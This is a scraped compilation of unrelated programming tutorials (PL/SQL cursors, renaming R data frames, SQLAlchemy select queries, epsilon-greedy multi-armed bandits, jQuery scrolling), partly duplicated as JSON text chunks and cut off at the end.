declaration section of the PL/SQL block. Creating an explicit cursor has the following steps − The cursor is declared as follows. Here, the cursor is c_student − CURSOR c_student IS Select Stu_ID,Stu_Name from Student; The cursor is opened as follows − OPEN c_student; One row at a time is accessed while fetching the cursor. Fetching the cursor is done as follows − FETCH c_student INTO c_stuID, c_stuName; The allocated memory is released when the cursor is closed. This is done as follows − CLOSE c_student;
[ { "code": null, "e": 1335, "s": 1062, "text": "When a SQL statement is executed in Oracle, the temporary context area is created. This area contains all the relevant information relating to the statement and its execution. The cursor is a pointer to this context area and allows the PL/SQL program to control this area." }, { "code": null, "e": 1367, "s": 1335, "text": "There are two types of Cursors." }, { "code": null, "e": 1384, "s": 1367, "text": "Implicit Cursors" }, { "code": null, "e": 1401, "s": 1384, "text": "Explicit Cursors" }, { "code": null, "e": 1438, "s": 1401, "text": "Let us begin with Implicit Cursors −" }, { "code": null, "e": 1657, "s": 1438, "text": "Whenever an SQL statement is executed, the implicit cursors are automatically created. This happens if there is no explicit cursor for the particular statement. Implicit cursors cannot be controlled by the programmers." }, { "code": null, "e": 1734, "s": 1657, "text": "There are many different attributes for Implicit Cursors. Some of them are −" }, { "code": null, "e": 1884, "s": 1734, "text": "If one or more records were fetched successfully with commands such as INSERT, UPDATE, DELETE etc., then it returns TRUE. Otherwise it returns FALSE." }, { "code": null, "e": 2073, "s": 1884, "text": "This is the direct opposite of %FOUND. If one or more records were fetched successfully with commands such as INSERT, UPDATE, DELETE etc., then it returns FALSE. Otherwise it returns TRUE." }, { "code": null, "e": 2181, "s": 2073, "text": "This returns the number of rows that are affected by different commands such as INSERT, UPDATE, DELETE etc." }, { "code": null, "e": 2373, "s": 2181, "text": "This returns TRUE if the cursor is open and false otherwise. However, for implicit cursors, the value is always FALSE because the cursor is closed immediately after executing its instruction." }, { "code": null, "e": 2563, "s": 2373, "text": "While implicit cursors were automatically created, explicit cursors are specifically created by the programmers. There definition is provided in the declaration section of the PL/SQL block." }, { "code": null, "e": 2617, "s": 2563, "text": "Creating an explicit cursor has the following steps −" }, { "code": null, "e": 2684, "s": 2617, "text": "The cursor is declared as follows. Here, the cursor is c_student −" }, { "code": null, "e": 2741, "s": 2684, "text": "CURSOR c_student IS\nSelect Stu_ID,Stu_Name from Student;" }, { "code": null, "e": 2775, "s": 2741, "text": "The cursor is opened as follows −" }, { "code": null, "e": 2791, "s": 2775, "text": "OPEN c_student;" }, { "code": null, "e": 2889, "s": 2791, "text": "One row at a time is accessed while fetching the cursor. Fetching the cursor is done as follows −" }, { "code": null, "e": 2930, "s": 2889, "text": "FETCH c_student INTO\nc_stuID, c_stuName;" }, { "code": null, "e": 3016, "s": 2930, "text": "The allocated memory is released when the cursor is closed. This is done as follows −" }, { "code": null, "e": 3033, "s": 3016, "text": "CLOSE c_student;" } ]
How to change the name of a data frame in R?
To change the name of a data frame, we can set the original name to the new name. Now both of the names can be used. Most of the times the purpose behind changing the name of the data frame is that, the original name does not seem to be a valid name based on the characteristics of the data. For example, if we have normally distributed columns in the data frame then we can name it as normal_distribution. This will help everyone to understand the data belongs to normal distribution. Live Demo set.seed(24) x<−rnorm(20,1,0.25) df1<−data.frame(x) df1 x 1 0.8635298 2 1.1341463 3 1.1049058 4 0.8540932 5 1.2118650 6 1.0665055 7 1.1111463 8 0.8833762 9 0.7879075 10 1.0005780 11 0.6707730 12 1.1495673 13 0.8094464 14 0.6427274 15 1.0830611 16 0.8827348 17 0.9162533 18 1.3840630 19 1.1524986 20 1.1290839 Changing the name of df1 to Normal_Distribution − Normal_Distribution<−df1 Normal_Distribution x 1 0.8635298 2 1.1341463 3 1.1049058 4 0.8540932 5 1.2118650 6 1.0665055 7 1.1111463 8 0.8833762 9 0.7879075 10 1.0005780 11 0.6707730 12 1.1495673 13 0.8094464 14 0.6427274 15 1.0830611 16 0.8827348 17 0.9162533 18 1.3840630 19 1.1524986 20 1.1290839 Live Demo y<−sample(0:5,20,replace=TRUE) df2<−data.frame(y) df2 y 1 4 2 2 3 2 4 3 5 3 6 1 7 1 8 2 9 0 10 4 11 4 12 3 13 5 14 1 15 0 16 0 17 4 18 2 19 2 20 5 Changing the name of df2 to Random_Sample − Random_Sample<−df2 Random_Sample y 1 4 2 2 3 2 4 3 5 3 6 1 7 1 8 2 9 0 10 4 11 4 12 3 13 5 14 1 15 0 16 0 17 4 18 2 19 2 20 5
[ { "code": null, "e": 1548, "s": 1062, "text": "To change the name of a data frame, we can set the original name to the new name. Now both of the names can be used. Most of the times the purpose behind changing the name of the data frame is that, the original name does not seem to be a valid name based on the characteristics of the data. For example, if we have normally distributed columns in the data frame then we can name it as normal_distribution. This will help everyone to understand the data belongs to normal distribution." }, { "code": null, "e": 1559, "s": 1548, "text": " Live Demo" }, { "code": null, "e": 1615, "s": 1559, "text": "set.seed(24)\nx<−rnorm(20,1,0.25)\ndf1<−data.frame(x)\ndf1" }, { "code": null, "e": 1874, "s": 1615, "text": " x\n1 0.8635298\n2 1.1341463\n3 1.1049058\n4 0.8540932\n5 1.2118650\n6 1.0665055\n7 1.1111463\n8 0.8833762\n9 0.7879075\n10 1.0005780\n11 0.6707730\n12 1.1495673\n13 0.8094464\n14 0.6427274\n15 1.0830611\n16 0.8827348\n17 0.9162533\n18 1.3840630\n19 1.1524986\n20 1.1290839" }, { "code": null, "e": 1924, "s": 1874, "text": "Changing the name of df1 to Normal_Distribution −" }, { "code": null, "e": 1969, "s": 1924, "text": "Normal_Distribution<−df1\nNormal_Distribution" }, { "code": null, "e": 2227, "s": 1969, "text": " x\n1 0.8635298\n2 1.1341463\n3 1.1049058\n4 0.8540932\n5 1.2118650\n6 1.0665055\n7 1.1111463\n8 0.8833762\n9 0.7879075\n10 1.0005780\n11 0.6707730\n12 1.1495673\n13 0.8094464\n14 0.6427274\n15 1.0830611\n16 0.8827348\n17 0.9162533\n18 1.3840630\n19 1.1524986\n20 1.1290839" }, { "code": null, "e": 2238, "s": 2227, "text": " Live Demo" }, { "code": null, "e": 2292, "s": 2238, "text": "y<−sample(0:5,20,replace=TRUE)\ndf2<−data.frame(y)\ndf2" }, { "code": null, "e": 2387, "s": 2292, "text": " y\n1 4\n2 2\n3 2\n4 3\n5 3\n6 1\n7 1\n8 2\n9 0\n10 4\n11 4\n12 3\n13 5\n14 1\n15 0\n16 0\n17 4\n18 2\n19 2\n20 5" }, { "code": null, "e": 2431, "s": 2387, "text": "Changing the name of df2 to Random_Sample −" }, { "code": null, "e": 2464, "s": 2431, "text": "Random_Sample<−df2\nRandom_Sample" }, { "code": null, "e": 2559, "s": 2464, "text": " y\n1 4\n2 2\n3 2\n4 3\n5 3\n6 1\n7 1\n8 2\n9 0\n10 4\n11 4\n12 3\n13 5\n14 1\n15 0\n16 0\n17 4\n18 2\n19 2\n20 5" } ]
SQLAlchemy Core - Selecting Rows
In this chapter, we will discuss about the concept of selecting rows in the table object. The select() method of table object enables us to construct SELECT expression. s = students.select() The select object translates to SELECT query by str(s) function as shown below − 'SELECT students.id, students.name, students.lastname FROM students' We can use this select object as a parameter to execute() method of connection object as shown in the code below − result = conn.execute(s) When the above statement is executed, Python shell echoes following equivalent SQL expression − SELECT students.id, students.name, students.lastname FROM students The resultant variable is an equivalent of cursor in DBAPI. We can now fetch records using fetchone() method. row = result.fetchone() All selected rows in the table can be printed by a for loop as given below − for row in result: print (row) The complete code to print all rows from students table is shown below − from sqlalchemy import create_engine, MetaData, Table, Column, Integer, String engine = create_engine('sqlite:///college.db', echo = True) meta = MetaData() students = Table( 'students', meta, Column('id', Integer, primary_key = True), Column('name', String), Column('lastname', String), ) s = students.select() conn = engine.connect() result = conn.execute(s) for row in result: print (row) The output shown in Python shell is as follows − (1, 'Ravi', 'Kapoor') (2, 'Rajiv', 'Khanna') (3, 'Komal', 'Bhandari') (4, 'Abdul', 'Sattar') (5, 'Priya', 'Rajhans') The WHERE clause of SELECT query can be applied by using Select.where(). For example, if we want to display rows with id >2 s = students.select().where(students.c.id>2) result = conn.execute(s) for row in result: print (row) Here c attribute is an alias for column. Following output will be displayed on the shell − (3, 'Komal', 'Bhandari') (4, 'Abdul', 'Sattar') (5, 'Priya', 'Rajhans') Here, we have to note that select object can also be obtained by select() function in sqlalchemy.sql module. The select() function requires the table object as argument. from sqlalchemy.sql import select s = select([users]) result = conn.execute(s) 21 Lectures 1.5 hours Jack Chan Print Add Notes Bookmark this page
[ { "code": null, "e": 2430, "s": 2340, "text": "In this chapter, we will discuss about the concept of selecting rows in the table object." }, { "code": null, "e": 2509, "s": 2430, "text": "The select() method of table object enables us to construct SELECT expression." }, { "code": null, "e": 2531, "s": 2509, "text": "s = students.select()" }, { "code": null, "e": 2612, "s": 2531, "text": "The select object translates to SELECT query by str(s) function as shown below −" }, { "code": null, "e": 2681, "s": 2612, "text": "'SELECT students.id, students.name, students.lastname FROM students'" }, { "code": null, "e": 2796, "s": 2681, "text": "We can use this select object as a parameter to execute() method of connection object as shown in the code below −" }, { "code": null, "e": 2821, "s": 2796, "text": "result = conn.execute(s)" }, { "code": null, "e": 2917, "s": 2821, "text": "When the above statement is executed, Python shell echoes following equivalent SQL expression −" }, { "code": null, "e": 2984, "s": 2917, "text": "SELECT students.id, students.name, students.lastname\nFROM students" }, { "code": null, "e": 3094, "s": 2984, "text": "The resultant variable is an equivalent of cursor in DBAPI. We can now fetch records using fetchone() method." }, { "code": null, "e": 3118, "s": 3094, "text": "row = result.fetchone()" }, { "code": null, "e": 3195, "s": 3118, "text": "All selected rows in the table can be printed by a for loop as given below −" }, { "code": null, "e": 3229, "s": 3195, "text": "for row in result:\n print (row)" }, { "code": null, "e": 3302, "s": 3229, "text": "The complete code to print all rows from students table is shown below −" }, { "code": null, "e": 3716, "s": 3302, "text": "from sqlalchemy import create_engine, MetaData, Table, Column, Integer, String\nengine = create_engine('sqlite:///college.db', echo = True)\nmeta = MetaData()\n\nstudents = Table(\n 'students', meta, \n Column('id', Integer, primary_key = True), \n Column('name', String), \n Column('lastname', String), \n)\n\ns = students.select()\nconn = engine.connect()\nresult = conn.execute(s)\n\nfor row in result:\n print (row)" }, { "code": null, "e": 3765, "s": 3716, "text": "The output shown in Python shell is as follows −" }, { "code": null, "e": 3883, "s": 3765, "text": "(1, 'Ravi', 'Kapoor')\n(2, 'Rajiv', 'Khanna')\n(3, 'Komal', 'Bhandari')\n(4, 'Abdul', 'Sattar')\n(5, 'Priya', 'Rajhans')\n" }, { "code": null, "e": 4007, "s": 3883, "text": "The WHERE clause of SELECT query can be applied by using Select.where(). For example, if we want to display rows with id >2" }, { "code": null, "e": 4112, "s": 4007, "text": "s = students.select().where(students.c.id>2)\nresult = conn.execute(s)\n\nfor row in result:\n print (row)" }, { "code": null, "e": 4203, "s": 4112, "text": "Here c attribute is an alias for column. Following output will be displayed on the shell −" }, { "code": null, "e": 4276, "s": 4203, "text": "(3, 'Komal', 'Bhandari')\n(4, 'Abdul', 'Sattar')\n(5, 'Priya', 'Rajhans')\n" }, { "code": null, "e": 4446, "s": 4276, "text": "Here, we have to note that select object can also be obtained by select() function in sqlalchemy.sql module. The select() function requires the table object as argument." }, { "code": null, "e": 4525, "s": 4446, "text": "from sqlalchemy.sql import select\ns = select([users])\nresult = conn.execute(s)" }, { "code": null, "e": 4560, "s": 4525, "text": "\n 21 Lectures \n 1.5 hours \n" }, { "code": null, "e": 4571, "s": 4560, "text": " Jack Chan" }, { "code": null, "e": 4578, "s": 4571, "text": " Print" }, { "code": null, "e": 4589, "s": 4578, "text": " Add Notes" } ]
Solving the Multi-Armed Bandit Problem | by Anson Wong | Towards Data Science
The multi-armed bandit problem is a classic reinforcement learning example where we are given a slot machine with n arms (bandits) with each arm having its own rigged probability distribution of success. Pulling any one of the arms gives you a stochastic reward of either R=+1 for success, or R=0 for failure. Our objective is to pull the arms one-by-one in sequence such that we maximize our total reward collected in the long run. The non-triviality of the multi-armed bandit problem lies in the fact that we (the agent) cannot access the true bandit probability distributions — all learning is carried out via the means of trial-and-error and value estimation. So the question is: How can we design a systematic strategy that adapts to these stochastic rewards? This is our goal for the multi-armed bandit problem, and having such a strategy would prove very useful in many real-world situations where one would like to select the “best” bandit out of a group of bandits i.e. A/B testing, line-up optimization, evaluating social media influence. In this article, we approach the multi-armed bandit problem with a classical reinforcement learning technique of an epsilon-greedy agent with a learning framework of reward-average sampling to compute the action-value Q(a) to help the agent improve its future action decisions for long-term reward maximization. The Python code implementation of this multi-armed bandit algorithm solution can be found at my Github at: https://github.com/ankonzoid/LearningX/tree/master/classical_RL/multiarmed_bandit Please refer to our Appendix for more details about the epsilon-greedy agent, and how the reward-average sampling method is used to iteratively update Q(a). In the next section, we explain the results of deploying such an agent in the multi-armed bandit environment. More of my blogs, tutorials, and projects on Deep Learning and Reinforcement Learning can be found at my Medium and at my Github. Consider our Python code example of 10 hard-coded bandits each with their own individual success probabilities (remember that our agent is blind to these numbers, it can only realize them via sampling the bandits individually): Bandit #1 = 10% success rateBandit #2 = 50% success rateBandit #3 = 60% success rateBandit #4 = 80% success rate (best)Bandit #5 = 10% success rateBandit #6 = 25% success rateBandit #7 = 60% success rateBandit #8 = 45% success rateBandit #9 = 75% success rate (2nd best)Bandit #10 = 65% success rate (3rd best) By inspection, we will be expecting our the agent in the long-term to pick out Bandit #4 as the strongest signal, with Bandit #9 following second, and Bandit #10 following third, etc. Now to the results. We performed 2,000 experiments for the agent to start from scratch with epsilon exploration probability of 10%, and trained the agent for 10,000 episodes per experiment. The average proportion of bandits chosen by the agent as a function of episode number is depicted in Fig 1. In Fig 1, we can see that that the selection choice of bandits is uniformly distributed at ~10% amongst all bandits near the beginning of training (< 10 episodes) as it is in its exploratory phase of not knowing which bandits to take advantage of yet. It is until we reach later episodes (> 100 episodes) do we see a clear greedy mechanism take precedence in deciding which bandits should get more priority because of the rewards sampled so far. As expected Bandits #4, #9, #10 at this mid-to-late training phase are the ones that get chosen by the agent. Lastly and almost inevitably, the agent tends to almost always choose Bandit #4 as the “best” bandit at the end of training with a plateau of ~90% (since ~10% should always remain because of the fixed epsilon exploration parameter). Although the optimal policy is to select Bandit #4 in this problem, you will notice that this does not mean that pulling Bandit #4 will always beat any other bandit on a given pull since the rewards are stochastic; it is in the long-term reward average that you will find Bandit #4 to dominate. Also, there is nothing particularly special about using our agent to approach this problem— it is just one of many methods that can adaptively maximize the collection of long-term rewards. There definitely exists situations where a completely exploratory (epsilon = 100%), or a completely greedy agent (epsilon = 0%), or anything in between, could end up collecting more rewards for a finite number of episodes than our epsilon=10%-greedy agent. The main appeal of deploying such an agent in my perspective is for the automation of minimizing re-choosing bandits that have already shown some evidence of failure. From a business and practical perspective, this can save a lot of time and resources that would be otherwise wasted in the optimization process of finding the “best” bandit. In a nutshell, the epsilon-greedy agent is a hybrid of a (1) completely-exploratory agent and a (2) completely-greedy agent. In the multi-armed bandit problem, a completely-exploratory agent will sample all the bandits at a uniform rate and acquire knowledge about every bandit over time; the caveat of such an agent is that this knowledge is never utilized to help itself to make better future decisions! On the other extreme, a completely-greedy agent will choose a bandit and stick with its choice for the rest of eternity; it will not make an effort to try out other bandits in the system to see whether they have better success rates to help it maximize its long-term rewards, thus it is very narrow-minded! To get a somewhat desirable agent that possesses the best of both worlds, the epsilon-greedy agent is designed to give an epsilon chance (say for example 10%) towards exploring bandits randomly at any state, and acts greedily on its current ‘best’ bandit value estimate for all other times. The intuition surrounding this is that the greedy-mechanism can help the agent focus on its currently most “successful” bandits, and the exploratory-mechanism gives the agent to explore for better bandits that might be out there. The only thing left is: how do we define a notion of “value” of a bandit to the agent so that it can choose greedily? Borrowing from reinforcement learning, we can define the action-value function Q(s, a) to represent the expected long-term reward of taking action a from state s. In our case of the multi-armed bandit, each action brings the agent to a terminal state so long-term rewards are exactly the immediate rewards and we simplify the notation of the definition of the action-value as where k is the counter for how many times action a (bandit) was chosen in the past, and r are the stochastic rewards for each time that bandit was chosen. With some extra arithmetic manipulation, this definition can be re-written recursively as As we do not know start off knowing the “true” values of Q(a), we can use this recursive definition as an iterative tool for approximating Q(a) at the end of every episode. To pair up the epsilon-greedy agent with our action-values Q(a) estimates, we let the epsilon-greedy agent choose a bandit at random epsilon-probability of the time, and let the agent use greedily choose an action from our Q(a) estimates for the rest of the times With these two concepts down, we can now go about solving the multi-armed bandit problem!
[ { "code": null, "e": 605, "s": 172, "text": "The multi-armed bandit problem is a classic reinforcement learning example where we are given a slot machine with n arms (bandits) with each arm having its own rigged probability distribution of success. Pulling any one of the arms gives you a stochastic reward of either R=+1 for success, or R=0 for failure. Our objective is to pull the arms one-by-one in sequence such that we maximize our total reward collected in the long run." }, { "code": null, "e": 856, "s": 605, "text": "The non-triviality of the multi-armed bandit problem lies in the fact that we (the agent) cannot access the true bandit probability distributions — all learning is carried out via the means of trial-and-error and value estimation. So the question is:" }, { "code": null, "e": 937, "s": 856, "text": "How can we design a systematic strategy that adapts to these stochastic rewards?" }, { "code": null, "e": 1221, "s": 937, "text": "This is our goal for the multi-armed bandit problem, and having such a strategy would prove very useful in many real-world situations where one would like to select the “best” bandit out of a group of bandits i.e. A/B testing, line-up optimization, evaluating social media influence." }, { "code": null, "e": 1640, "s": 1221, "text": "In this article, we approach the multi-armed bandit problem with a classical reinforcement learning technique of an epsilon-greedy agent with a learning framework of reward-average sampling to compute the action-value Q(a) to help the agent improve its future action decisions for long-term reward maximization. The Python code implementation of this multi-armed bandit algorithm solution can be found at my Github at:" }, { "code": null, "e": 1722, "s": 1640, "text": "https://github.com/ankonzoid/LearningX/tree/master/classical_RL/multiarmed_bandit" }, { "code": null, "e": 1989, "s": 1722, "text": "Please refer to our Appendix for more details about the epsilon-greedy agent, and how the reward-average sampling method is used to iteratively update Q(a). In the next section, we explain the results of deploying such an agent in the multi-armed bandit environment." }, { "code": null, "e": 2119, "s": 1989, "text": "More of my blogs, tutorials, and projects on Deep Learning and Reinforcement Learning can be found at my Medium and at my Github." }, { "code": null, "e": 2347, "s": 2119, "text": "Consider our Python code example of 10 hard-coded bandits each with their own individual success probabilities (remember that our agent is blind to these numbers, it can only realize them via sampling the bandits individually):" }, { "code": null, "e": 2658, "s": 2347, "text": "Bandit #1 = 10% success rateBandit #2 = 50% success rateBandit #3 = 60% success rateBandit #4 = 80% success rate (best)Bandit #5 = 10% success rateBandit #6 = 25% success rateBandit #7 = 60% success rateBandit #8 = 45% success rateBandit #9 = 75% success rate (2nd best)Bandit #10 = 65% success rate (3rd best)" }, { "code": null, "e": 2842, "s": 2658, "text": "By inspection, we will be expecting our the agent in the long-term to pick out Bandit #4 as the strongest signal, with Bandit #9 following second, and Bandit #10 following third, etc." }, { "code": null, "e": 3140, "s": 2842, "text": "Now to the results. We performed 2,000 experiments for the agent to start from scratch with epsilon exploration probability of 10%, and trained the agent for 10,000 episodes per experiment. The average proportion of bandits chosen by the agent as a function of episode number is depicted in Fig 1." }, { "code": null, "e": 3929, "s": 3140, "text": "In Fig 1, we can see that that the selection choice of bandits is uniformly distributed at ~10% amongst all bandits near the beginning of training (< 10 episodes) as it is in its exploratory phase of not knowing which bandits to take advantage of yet. It is until we reach later episodes (> 100 episodes) do we see a clear greedy mechanism take precedence in deciding which bandits should get more priority because of the rewards sampled so far. As expected Bandits #4, #9, #10 at this mid-to-late training phase are the ones that get chosen by the agent. Lastly and almost inevitably, the agent tends to almost always choose Bandit #4 as the “best” bandit at the end of training with a plateau of ~90% (since ~10% should always remain because of the fixed epsilon exploration parameter)." }, { "code": null, "e": 5011, "s": 3929, "text": "Although the optimal policy is to select Bandit #4 in this problem, you will notice that this does not mean that pulling Bandit #4 will always beat any other bandit on a given pull since the rewards are stochastic; it is in the long-term reward average that you will find Bandit #4 to dominate. Also, there is nothing particularly special about using our agent to approach this problem— it is just one of many methods that can adaptively maximize the collection of long-term rewards. There definitely exists situations where a completely exploratory (epsilon = 100%), or a completely greedy agent (epsilon = 0%), or anything in between, could end up collecting more rewards for a finite number of episodes than our epsilon=10%-greedy agent. The main appeal of deploying such an agent in my perspective is for the automation of minimizing re-choosing bandits that have already shown some evidence of failure. From a business and practical perspective, this can save a lot of time and resources that would be otherwise wasted in the optimization process of finding the “best” bandit." }, { "code": null, "e": 5724, "s": 5011, "text": "In a nutshell, the epsilon-greedy agent is a hybrid of a (1) completely-exploratory agent and a (2) completely-greedy agent. In the multi-armed bandit problem, a completely-exploratory agent will sample all the bandits at a uniform rate and acquire knowledge about every bandit over time; the caveat of such an agent is that this knowledge is never utilized to help itself to make better future decisions! On the other extreme, a completely-greedy agent will choose a bandit and stick with its choice for the rest of eternity; it will not make an effort to try out other bandits in the system to see whether they have better success rates to help it maximize its long-term rewards, thus it is very narrow-minded!" }, { "code": null, "e": 6245, "s": 5724, "text": "To get a somewhat desirable agent that possesses the best of both worlds, the epsilon-greedy agent is designed to give an epsilon chance (say for example 10%) towards exploring bandits randomly at any state, and acts greedily on its current ‘best’ bandit value estimate for all other times. The intuition surrounding this is that the greedy-mechanism can help the agent focus on its currently most “successful” bandits, and the exploratory-mechanism gives the agent to explore for better bandits that might be out there." }, { "code": null, "e": 6739, "s": 6245, "text": "The only thing left is: how do we define a notion of “value” of a bandit to the agent so that it can choose greedily? Borrowing from reinforcement learning, we can define the action-value function Q(s, a) to represent the expected long-term reward of taking action a from state s. In our case of the multi-armed bandit, each action brings the agent to a terminal state so long-term rewards are exactly the immediate rewards and we simplify the notation of the definition of the action-value as" }, { "code": null, "e": 6984, "s": 6739, "text": "where k is the counter for how many times action a (bandit) was chosen in the past, and r are the stochastic rewards for each time that bandit was chosen. With some extra arithmetic manipulation, this definition can be re-written recursively as" }, { "code": null, "e": 7157, "s": 6984, "text": "As we do not know start off knowing the “true” values of Q(a), we can use this recursive definition as an iterative tool for approximating Q(a) at the end of every episode." }, { "code": null, "e": 7421, "s": 7157, "text": "To pair up the epsilon-greedy agent with our action-values Q(a) estimates, we let the epsilon-greedy agent choose a bandit at random epsilon-probability of the time, and let the agent use greedily choose an action from our Q(a) estimates for the rest of the times" } ]
How to scroll to specific element using jQuery ? - GeeksforGeeks
03 Aug, 2021 Many times, in our website we want to scroll automatically to a section of the webpage when we click on a button or a heading in a navbar or a list. So, to achieve this automatic scrolling to the required element, we need to take the help of jQuery. Using jQuery, we can achieve this in a very simple way. But first we need to understand two methods namely scrollTop() and offSet() in jQuery. scrollTop() method: It helps to get the current vertical position of the scrollbar of the first element, in the set of all matched elements. scrollTop() method: It is used to set the vertical position of the scroll bar to the value ‘val’. offSet() Method: It is used to get the coordinates of the first element in the set of all matched elements. Example 1: This example describes how to scroll a specific element using jQuery. <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content= "width=device-width, initial-scale=1.0"> <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"> </script> <title> How to scroll to specific item using jQuery? </title> <style> div { color: #0f9d58; border: 3px solid #0f9d58; width: 200px; height: 100px; overflow: auto; } p { width: 300px; height: 300px; } </style></head> <body> <div class="demo"> <h1>Heading</h1> <p>paragraph</p> </div> <script> var container = $('div'); var scrollTo = $('p'); // Calculating new position of scrollbar var position = scrollTo.offset().top - container.offset().top + container.scrollTop(); // Setting the value of scrollbar container.scrollTop(position); </script></body> </html> Output: Example 2: In this example, we will see how to scroll to different sections of the page by clicking different buttons, along with a scrolling effect. <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content= "width=device-width, initial-scale=1.0"> <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"> </script> <title> How to scroll to specific item using jQuery? </title> <style> div { color: #0f9d58; border: 3px solid #0f9d58; margin: 10px; width: 200px; height: 100px; overflow: auto; } p { width: 300px; height: 300px; } button { margin: 10px; } </style></head> <body> <div class="demo"> <h1>Heading</h1> <p id="p1">paragraph 1</p> <p id="p2">paragraph 2</p> </div> <button onclick="scrollParagraph1()"> paragraph 1 </button> <button onclick="scrollParagraph2()"> paragraph 2 </button> <script> var container = $('div'); // Scrolls to paragraph 1 function scrollParagraph1() { var scrollTo = $("#p1"); // Calculating new position // of scrollbar var position = scrollTo.offset().top - container.offset().top + container.scrollTop(); // Animating scrolling effect container.animate({ scrollTop: position }); } // Scrolls to paragraph 2 function scrollParagraph2() { var scrollTo = $("#p2"); // Calculating new position // of scrollbar var position = scrollTo.offset().top - container.offset().top + container.scrollTop(); // Animating scrolling effect container.animate({ scrollTop: position }); } </script></body> </html> Output: When the second button is clicked, the output is as follows. jQuery is an open source JavaScript library that simplifies the interactions between an HTML/CSS document, It is widely famous with it’s philosophy of “Write less, do more”.You can learn jQuery from the ground up by following this jQuery Tutorial and jQuery Examples. Attention reader! Don’t stop learning now. Get hold of all the important HTML concepts with the Web Design for Beginners | HTML course. CSS-Misc HTML-Misc jQuery-Misc Picked CSS HTML JQuery Web Technologies HTML Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Build a Survey Form using HTML and CSS CSS | Text Formatting How to align content of a div to the bottom using CSS ? Primer CSS Flexbox Flex Direction Difference between em and rem units in CSS How to Insert Form Data into Database using PHP ? Form validation using HTML and JavaScript How to set input type date in dd-mm-yyyy format using HTML ? Hide or show elements in HTML using display property
[ { "code": null, "e": 24790, "s": 24762, "text": "\n03 Aug, 2021" }, { "code": null, "e": 25183, "s": 24790, "text": "Many times, in our website we want to scroll automatically to a section of the webpage when we click on a button or a heading in a navbar or a list. So, to achieve this automatic scrolling to the required element, we need to take the help of jQuery. Using jQuery, we can achieve this in a very simple way. But first we need to understand two methods namely scrollTop() and offSet() in jQuery." }, { "code": null, "e": 25324, "s": 25183, "text": "scrollTop() method: It helps to get the current vertical position of the scrollbar of the first element, in the set of all matched elements." }, { "code": null, "e": 25422, "s": 25324, "text": "scrollTop() method: It is used to set the vertical position of the scroll bar to the value ‘val’." }, { "code": null, "e": 25530, "s": 25422, "text": "offSet() Method: It is used to get the coordinates of the first element in the set of all matched elements." }, { "code": null, "e": 25611, "s": 25530, "text": "Example 1: This example describes how to scroll a specific element using jQuery." }, { "code": "<!DOCTYPE html><html lang=\"en\"> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content= \"width=device-width, initial-scale=1.0\"> <script src=\"https://code.jquery.com/jquery-3.5.1.min.js\" integrity=\"sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=\" crossorigin=\"anonymous\"> </script> <title> How to scroll to specific item using jQuery? </title> <style> div { color: #0f9d58; border: 3px solid #0f9d58; width: 200px; height: 100px; overflow: auto; } p { width: 300px; height: 300px; } </style></head> <body> <div class=\"demo\"> <h1>Heading</h1> <p>paragraph</p> </div> <script> var container = $('div'); var scrollTo = $('p'); // Calculating new position of scrollbar var position = scrollTo.offset().top - container.offset().top + container.scrollTop(); // Setting the value of scrollbar container.scrollTop(position); </script></body> </html>", "e": 26752, "s": 25611, "text": null }, { "code": null, "e": 26760, "s": 26752, "text": "Output:" }, { "code": null, "e": 26910, "s": 26760, "text": "Example 2: In this example, we will see how to scroll to different sections of the page by clicking different buttons, along with a scrolling effect." }, { "code": "<!DOCTYPE html><html lang=\"en\"> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content= \"width=device-width, initial-scale=1.0\"> <script src=\"https://code.jquery.com/jquery-3.5.1.min.js\" integrity=\"sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=\" crossorigin=\"anonymous\"> </script> <title> How to scroll to specific item using jQuery? </title> <style> div { color: #0f9d58; border: 3px solid #0f9d58; margin: 10px; width: 200px; height: 100px; overflow: auto; } p { width: 300px; height: 300px; } button { margin: 10px; } </style></head> <body> <div class=\"demo\"> <h1>Heading</h1> <p id=\"p1\">paragraph 1</p> <p id=\"p2\">paragraph 2</p> </div> <button onclick=\"scrollParagraph1()\"> paragraph 1 </button> <button onclick=\"scrollParagraph2()\"> paragraph 2 </button> <script> var container = $('div'); // Scrolls to paragraph 1 function scrollParagraph1() { var scrollTo = $(\"#p1\"); // Calculating new position // of scrollbar var position = scrollTo.offset().top - container.offset().top + container.scrollTop(); // Animating scrolling effect container.animate({ scrollTop: position }); } // Scrolls to paragraph 2 function scrollParagraph2() { var scrollTo = $(\"#p2\"); // Calculating new position // of scrollbar var position = scrollTo.offset().top - container.offset().top + container.scrollTop(); // Animating scrolling effect container.animate({ scrollTop: position }); } </script></body> </html>", "e": 28910, "s": 26910, "text": null }, { "code": null, "e": 28918, "s": 28910, "text": "Output:" }, { "code": null, "e": 28979, "s": 28918, "text": "When the second button is clicked, the output is as follows." }, { "code": null, "e": 29247, "s": 28979, "text": "jQuery is an open source JavaScript library that simplifies the interactions between an HTML/CSS document, It is widely famous with it’s philosophy of “Write less, do more”.You can learn jQuery from the ground up by following this jQuery Tutorial and jQuery Examples." }, { "code": null, "e": 29384, "s": 29247, "text": "Attention reader! Don’t stop learning now. Get hold of all the important HTML concepts with the Web Design for Beginners | HTML course." }, { "code": null, "e": 29393, "s": 29384, "text": "CSS-Misc" }, { "code": null, "e": 29403, "s": 29393, "text": "HTML-Misc" }, { "code": null, "e": 29415, "s": 29403, "text": "jQuery-Misc" }, { "code": null, "e": 29422, "s": 29415, "text": "Picked" }, { "code": null, "e": 29426, "s": 29422, "text": "CSS" }, { "code": null, "e": 29431, "s": 29426, "text": "HTML" }, { "code": null, "e": 29438, "s": 29431, "text": "JQuery" }, { "code": null, "e": 29455, "s": 29438, "text": "Web Technologies" }, { "code": null, "e": 29460, "s": 29455, "text": "HTML" }, { "code": null, "e": 29558, "s": 29460, "text": "Writing code in comment?\nPlease use 